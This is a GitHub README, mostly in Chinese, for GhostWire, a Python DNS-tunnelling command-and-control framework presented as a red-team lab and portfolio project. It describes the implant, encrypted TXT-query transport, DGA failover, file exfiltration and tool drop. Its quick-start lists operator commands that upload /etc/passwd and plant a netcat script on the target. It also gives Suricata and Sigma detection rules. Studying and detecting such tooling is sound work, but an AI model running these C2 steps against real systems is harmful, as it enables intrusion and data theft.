Nis3phraim/GhostWire

# GhostWire C2 框架 GhostWire 是一个轻量级、模块化的 C2 框架，专为**受控的网络安全研究、红队实验室和作品集演示**而设计。它演示了通过 DNS 隐蔽通道进行的真实世界对手攻击技术，并具备强大的加密、会话管理和文件传输功能。 **适用对象：** 研究 DNS 隧道和加密 C2 流量的红队操作员、威胁猎手和 SOC 分析师。 ## 演示 ### GhostWire 操作员控制台      ## 展示技能 - Python 开发 - 网络编程 - DNS 协议分析 - 密码学概念 - 检测工程 - 安全自动化 - 威胁模拟 - MITRE ATT&CK 映射 - SQLite 持久化 ## 架构 ┌─────────────┐ DNS TXT/UDP ┌──────────────────┐ │ Implant │ ◄────────────────────► │ DNS Listener │ │ (Agent) │ AES-256-CTR + RSA │ (C2 Server) │ └─────────────┘ └──────────────────┘ ↑ ↑ [Target Lab] [Operator Console] - **传输层：** DNS TXT 查询（隐蔽性强，与正常流量混为一体） - **加密：** RSA-2048 密钥交换 → AES-256-CTR 会话流量 - **路由：** DGA（域名生成算法）并带有备用域名 - **数据库：** SQLite 会话/命令/结果持久化 - **日志记录：** 基于文件的审计日志，记录所有 C2 事件 ## 功能 | 功能 | 状态 | MITRE ATT&CK | |------------|--------|--------------| | 加密 DNS C2 | ✅ | [T1071.004](docs/MITRE.md) | | AES-256 会话加密 | ✅ | [T1573.001](docs/MITRE.md) | | 文件上传（数据外发） | ✅ | [T1041](docs/MITRE.md) | | 文件下载（工具投放） | ✅ | [T1105](docs/MITRE.md) | | DGA 故障转移域名 | ✅ | [T1568.001](docs/MITRE.md) | | 命令历史与日志记录 | ✅ | — | | SQLite 持久化 | ✅ | — | ## 快速开始 ``` # 设置环境（安装 deps，创建 dirs，生成 keys） ./setup.sh # 启动 C2 服务器 python server/ghostwire.py # 在另一个终端中，运行 implant（实验目标） python agent/implant.py GhostWire> sessions GhostWire> cmd whoami GhostWire> upload /etc/passwd GhostWire> download ./tools/netcat.sh /tmp/nc.sh GhostWire> history Blue Team / Detection Guide This section demonstrates the defensive counterpart to GhostWire's offensive capabilities. Network Indicators DNS queries to DGA-looking subdomains on port 5354 (or configured port) High-frequency TXT lookups with base64-like labels Query pattern: ..... Detection Rules Suricata / Zeek Notice # 检测指向 C2 域名的高流量 DNS TXT 查询 alert dns any any -> any 5354 (msg:"GHOSTWIRE Possible DNS C2 Beacon"; dns.query; pcre:"/^[a-f0-9]{8}\.(bcon|cmd|data|reg)\.[0-9]+\./"; sid:1000001; rev:1;) title: GhostWire DNS C2 Detection logsource: category: dns detection: selection: record_type: TXT query|re: '^[a-f0-9]{8}\.(bcon|cmd|data|reg|upld|dnld)\.[0-9]+\.' condition: selection falsepositives: Unknown level: high Host Artifacts logs/ghostwire.log on compromised machine (if not cleaned) Python process making DNS queries every 60s ± jitter Defensive Recommendations Monitor for TXT query anomalies — most benign DNS uses A/AAAA/CNAME, not frequent TXT. Track DGA patterns — high entropy subdomains with low TTL. Correlate beaconing intervals — regular 60s intervals with jitter are characteristic of C2. Use DNS sinkholes for the observed backup domains. Project Structure GhostWire/ ├── agent/implant.py # Target-side implant ├── server/ │ ├── ghostwire.py # Operator console │ └── dns_listener.py # DNS C2 engine ├── shared/ │ ├── crypto.py # AES + RSA implementation │ ├── protocol.py # Message format constants │ ├── dga.py # Domain Generation Algorithm │ ├── config.py # Central configuration │ ├── database.py # SQLite persistence │ └── logger.py # File audit logging ├── docs/MITRE.md # ATT&CK mapping ├── generate_keys.py # RSA key generator ├── setup.sh # One-command lab setup ├── requirements.txt └── README.md Ethical Use & Disclaimer GhostWire is built for authorized cybersecurity education, red team labs, and portfolio demonstration. It is intended to be used only in environments you own or have explicit written permission to test. By using this software, you agree to follow responsible disclosure practices and comply with all applicable laws. Tech Stack Language: Python 3 Crypto: cryptography (AES-256-CTR, RSA-2048-OAEP) DNS: dnslib + dnspython DB: SQLite3 UI: Terminal Operator Console ```

标签：C2框架, DNS隐蔽信道, IP 地址批量处理, Python, 安全学习资源, 无后门, 网络安全, 隐私保护